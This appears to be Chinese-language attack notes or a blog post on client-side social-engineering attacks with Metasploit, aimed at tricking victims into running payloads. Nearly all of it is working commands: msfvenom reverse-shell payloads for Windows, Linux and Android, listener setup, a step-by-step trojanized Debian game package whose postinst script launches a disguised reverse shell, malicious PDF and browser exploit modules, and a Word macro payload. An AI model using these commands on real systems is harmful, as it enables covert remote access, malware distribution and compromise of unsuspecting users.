在無法通過網絡邊界的情況下轉而攻擊客戶端----進行社會工程學攻擊,進而滲透線上業務網絡
含有漏洞利用代碼的web站點--利用客戶端漏洞
含有漏洞利用代碼的doc,pdf等文檔----誘使被害者執行payload
誘騙被害者執行payload(windows)
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o xx.exe
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.13
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit
誘騙被害者執行payload(linux deb安裝包)
apt-get --download-only install freesweep(一個掃雷游戲,你也可以下載其他的)
cd /var/cache/apt/archives/(所有apt-get install 過包都在這個文件夾里面/var/cache/apt/archives/)
cp freesweep_1.0.1-1_amd64.deb /root/(把游戲復制到root下)
dpkg -x freesweep_1.0.1-1_amd64.deb free(解壓包,把解壓的文件放在free這個目錄)
touch control && touch postinst(cd到free目錄下創建一個文件夾DEBIAN,並進入這個文件夾,創建兩個文件)
vim control(這個包的描述信息)
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
vim postinst(添加一個bash腳本)
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep _scores
最后賦予它權限,並重新打包
msf准備監聽
利用Acrobat Reader漏洞執行payload
構造PDF文件:exploit/windows/fileformat/adobe_utilprintf
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit(會生成一個pdf文件)
然后監聽
構造惡意網站:exploit/windows/browser/adobe_utilprintf(利用adobe8.1.2的緩沖區溢出)
設置好payload
利用flash插件漏洞執行payload
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_opaque_background_uaf
auxiliary/server/browser_autopwn2
利用IE瀏覽器漏洞執行payload
exploit/windows/browser/ms14_064_ole_code_execution
利用JRE漏洞執行payload
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
生成安卓后門程序
use payload/android/meterpreter/reverse_tcp
generate -f a.apk -p android -t raw
VBScript感染方式:
利用宏感染word,excel文檔
繞過某些基於文件類型檢查的安全機制
生成vbscript腳本:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
offfice2007:視圖---》宏-----》創建
payload第一部分粘入vba代碼
payload第二部分粘入word文檔正文
msf啟動監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn